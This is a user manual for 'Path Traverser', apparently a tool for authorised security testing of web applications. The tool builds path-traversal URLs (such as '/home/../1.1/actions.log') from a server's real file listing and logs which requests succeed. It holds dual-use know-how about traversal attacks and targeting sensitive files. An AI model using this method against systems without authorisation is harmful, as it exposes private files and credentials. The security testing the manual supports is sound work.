- What is Path Traverser?
- How does it work?
- Configuration (4 Steps)
- Other features
What is Path Traverser?
Path Traverser is a tool for security testing of web applications.
It simulates a real Path Traversal attack, only with actual existing files, so you won't need to use a general lists, or pick the files one by one...
It operates as a middleman between your web application to its host server, giving you the abillity to test the actual files as found in your host server against the application, according to their relevant path.
How does it work?
After you have provided the relevant details, Path Traverser will connect (FTP) to your host server in order to pull out (ls -R) the list of files. The file could be found in the Path Traverser directory under the name: listofFiles.txt
Then, it will manipulate the list taken from the file system so it will fit the web application by changing their path.
How? Lets say that your application could be found at: http://mysrvr:777/home
and the application files could be found in the file system under: myapps/demoapp/client/version/lastversion.
Each file in the files system will receive its relevant path, so the files under: /myapps/demoapp/client/version/1.1/ will be created as: http://mysrvr:777/home/../1.1/ and requests for files under /myapp/differentapp/files/ will be created as: http://mysrvr:777/home/../../../../differentapp/files/, etc.
The manipulated file could be found in the Path Traverser directory under the name: url_list.txt
After that, the Path Traverser will start sending these requests one by one.
You will be able to follow via the progress bar or the log file that could be found under the name: requestsLog.txt
If something goes worng, go to the Log Tab and try to figure up what when wrong, or contact me at: firstname.lastname@example.org - I will gladly help!
Now its time to view the results, that could be found in the Results Tab.
Each request that received one of the selected response codes from the server, will be displayed next to the code in the Results Tab.
e.g.:  http://http://mysrvr:777/home/../1.1/actions.log.
They could also be found under in the file holding the relevant response code: e.g.: Res200.txt -
in one of the two folders: under the folder holding the host's name (e.g.: mysrvr_Results) Or, if the file was uploaded manualy, under the folder: _Results
Configuration - How to make it work in 4 simple steps?
It might look a little complicated, but it is actually pretty trivial... just follow these steps:
1. Application URL
Enter your application URL, as it sould be reached through the browser, e.g.: https://myapp:777/home
2. Home Directory
Enter the application path in the files system, where it holds the files for the web application, e.g.: /myapps/demoapp/client/version/lastversion
3. HTTP Status Codes
For each request sent, if the response from the server is a code you have selected (multi choice), it will be written to the relevant file and to the Results Tab.
e.g.: if you have selected the codes: 200 OK and 403 Forbidden - if a the response for the file: http://http://mysrvr:777/home/../1.1/actions.log is one of the two, you would be able to find it in the Results Tab as:  http://http://mysrvr:777/home/../1.1/actions.log and in the file: Res200.txt or Res403.txt under the Results Folder. The default is set to: 200 OK only.
4. Get file from Host / Upload Manually
In order for the Path Traversal to perform the attack and start sending the requests, it need one of the two sources:
I. the host credentials: name, user and password - then, it connects to the server to execute the command (ls -R) and get the file via FTP.
if this is the option selected, the Path Traverser will then perform manipulation on the file to make it suitable for the application, as expplained in the How does it work? section.
The file with the ready requests list could be found under: url_list.txt
II. the other option, is to ipload a ready list of requests to send using the Upload manually option, just browse the relevant file.
That's it! now you are good to go - Press on the Start button (of course, you can Pause or Stop at any time).
The Status Bar will display the current action being performed by the Path Traverser, or will display any Error message it got that need the user's handling, so keep your attention to it...
Path Traversal / Access to Files
This feature allows you to choose between Path Traversal attack - which sends the requests for files along all file system
and Access to Files - which sends the requests for the application files only. The defaul is set to Path Traversal.
Just click on the desired method:
You can also perform the attack with dirrent roles / permissions.
All you have to do is check the Authenticated checkbox and provide with the relevant cookie:
Sometimes, applications return valid responses (e.g. 200 OK) on unavailable pages as well, so infact the request was not successful.
In that case, you can manually add the error message, so if it appears in the response, it would not be considured as a successful result.
click on the Error Message checkbox and provide with the Error string: (e.g. "Please contact your Administrator")
File Type Configuration
If you want to test only specific file types (logs, source code files, xml, etc...) you can configure the Path Traverser to use specific file type (choosing the Use only the following File Types) option or to exclude them (choosing the Exclude the following File Types).
To do so, click on the Configure button next to the Manual option after you selected it, or go to the Configuration Tab and click the Enable button.
There, you can select a family of files to test/exclude or add your own by checking next to the Other checkbox and add the file types, seperated by commas (e.g.: xml, log, sql, sh). You can always go back to default by clicking the Restore to Default button or click the Disable button:
You are only the tester? you don't know where the application files could be found in the file system of the server?
you can provide with a file name or folder, you know exists in the application (came across it while testing...) and let the Path Traverser suggest available location.Click on the ? next to the Home Directory field, or check the file/folder in host's file system in the Configuration Tab, choose a File or a Library, enter the name and click find (important!! you must provide with the host credentials). A list of locations where it was found in the env. will be displayed:
If you would like to use one of them, select it and press the Use selected; it will now add it to the Home Directory field.
if you need to edit them (use one folder back) just go to the Main Tab and edit them in the Home Directory field.
Save / Load State
If you don't want to fill in the details each time again and again - click on the Save state to save the details inserted.
These details will could be found in the Path Traverser folder under the name: template.ptt.
It could be now load up by pressing the Load state button:
Skip to Line
If for any reason, the test stopped, you don't have to start all over. Check the Skip to line #, after you've uploaded the last file you used, or that was created: url_list.txt as explained here.
Then, enter the desired line number and press the Run button. The tests will start from that line until the end of the file.